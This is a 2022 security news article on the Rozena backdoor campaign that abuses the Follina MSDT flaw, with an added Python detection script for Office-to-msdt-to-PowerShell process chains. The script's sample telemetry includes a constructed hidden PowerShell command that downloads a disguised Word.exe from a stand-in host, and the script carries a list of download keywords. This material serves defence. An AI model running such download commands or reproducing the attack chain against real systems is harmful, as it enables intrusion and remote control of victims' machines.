The new Rozena backdoor joins the fray in abusing the Follina flaw

July 21, 2022

A research group has discovered a phishing operation, dubbed Rozena, that exploits the recently disclosed critical Follina vulnerability (CVE-2022-30190). According to reports, the threat actors are distributing the Rozena backdoor to targeted Windows systems.

The researchers disclosed that Rozena is a backdoor that opens a remote shell connection back to its operator. Once that connection is established, the compromise can affect all systems connected to the same network.

According to a separate researcher's analysis, the Rozena campaign abuses the critical Follina vulnerability, a remote code execution (RCE) flaw in the Microsoft Windows Support Diagnostic Tool (MSDT).

The attack chain begins with a weaponised Office document that, when opened by the target, connects to an external Discord CDN URL. Through this request the attackers retrieve an HTML file named index[.]htm.

Once the HTML file is loaded, it invokes msdt[.]exe and a PowerShell command that issues another web request to fetch the Rozena backdoor. The downloaded backdoor is then stored under a name that makes it look like a Word document (Word[.]exe).
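The chain described above (Office document, then msdt.exe, then a PowerShell download of the backdoor) leaves a distinctive process lineage in endpoint telemetry. The following is an added detection example written for this article; it is not code from the researchers it cites. The event fields (pid, ppid, image, cmdline) are an assumed shape loosely modelled on process-creation logs such as Sysmon Event ID 1, the sample events are constructed, and the sdiagnhost.exe hop between msdt.exe and PowerShell is an assumption about how MSDT runs its scripts, which is why the rules walk the full ancestry instead of checking only the direct parent.

```python
"""Follina-style process-chain detection over constructed telemetry.

Added example for this article, not the researchers' code. Event fields
are an assumed shape (Sysmon Event ID 1-like); sample events are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List

# Office hosts that should never be an ancestor of msdt.exe in normal use.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Substrings typical of a PowerShell download stage (matched case-insensitively).
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadstring",
                    "downloadfile", "net.webclient", "start-bitstransfer")
SHELLS = {"powershell.exe", "pwsh.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    chain: str      # root ancestor -> ... -> flagged process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestor_names(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                   max_depth: int = 8) -> List[str]:
    """Image names of ev's ancestors, nearest parent first. Bounded by
    max_depth so a corrupt or looping ppid chain cannot hang the scan."""
    names: List[str] = []
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None or parent.pid == cur.pid:
            break
        names.append(basename(parent.image))
        cur = parent
    return names


def detect_follina_chain(events: List[ProcEvent]) -> List[Alert]:
    """Two rules covering the chain the article describes:
    1. msdt.exe with an Office application anywhere in its ancestry
       (the Office-to-MSDT hand-off is the Follina trigger).
    2. PowerShell descending from msdt.exe whose command line carries a
       download primitive (the stage that fetches the backdoor).
    Checking the whole ancestry keeps both rules working if MSDT runs the
    script through an intermediate helper process."""
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for e in events:
        name = basename(e.image)
        anc = ancestor_names(e, by_pid)          # nearest parent first
        chain = " -> ".join(list(reversed(anc)) + [name])
        if name == "msdt.exe" and OFFICE_APPS & set(anc):
            alerts.append(Alert("office_spawns_msdt", e.pid, chain))
        if name in SHELLS and "msdt.exe" in anc:
            if any(m in e.cmdline.lower() for m in DOWNLOAD_MARKERS):
                alerts.append(Alert("msdt_descendant_powershell_download", e.pid, chain))
    return alerts


# Constructed sample telemetry: one Follina-style chain plus two benign
# look-alikes that must not fire. Paths and arguments are made up.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n invoice.docx'),
    ProcEvent(300, 200, r"C:\Windows\System32\msdt.exe", "msdt.exe (constructed arguments)"),
    # assumed intermediate helper between msdt.exe and the script host
    ProcEvent(400, 300, r"C:\Windows\System32\sdiagnhost.exe", "sdiagnhost.exe -Embedding"),
    ProcEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden Invoke-WebRequest https://cdn.example.invalid/Word.exe "
              "-OutFile $env:TEMP\\Word.exe"),
    # benign: msdt started by the user from Explorer, no Office ancestor
    ProcEvent(600, 100, r"C:\Windows\System32\msdt.exe", "msdt.exe"),
    # benign: an admin's PowerShell download that does not descend from msdt
    ProcEvent(700, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Invoke-WebRequest https://intranet.example.invalid/tool.zip"),
]


def run_sample() -> List[Alert]:
    """Run the rules over the constructed events; expect exactly two alerts."""
    return detect_follina_chain(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.rule}] pid={a.pid} chain={a.chain}")
```

Run as a script it prints the two alerts for pids 300 and 500 and stays silent on the two benign events. In a real deployment the first rule is the higher-fidelity one, because an Office application launching msdt.exe has essentially no legitimate use, while the second rule is what surfaces the download stage once the trigger has fired.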

The Rozena backdoor appears intended to take full advantage of the targeted system.

Some researchers believe that the main objective of the Rozena campaign is to inject shellcode into the targeted system and establish a reverse shell back to the attackers' device.

If the shellcode injection succeeds, the threat actors gain control of the targeted system and can carry out any malicious activity on it, such as running further payloads.

Once the Rozena payload runs, it spawns a process for a PowerShell command. According to the experts' observations, the decoded command serves a single purpose: injecting the shellcode.

Several threat groups have repeatedly abused the critical Follina flaw in their operations. Fortunately, a patch for the flaw is available, and experts advise users to apply the update to eliminate the risk of being affected by this exploit.
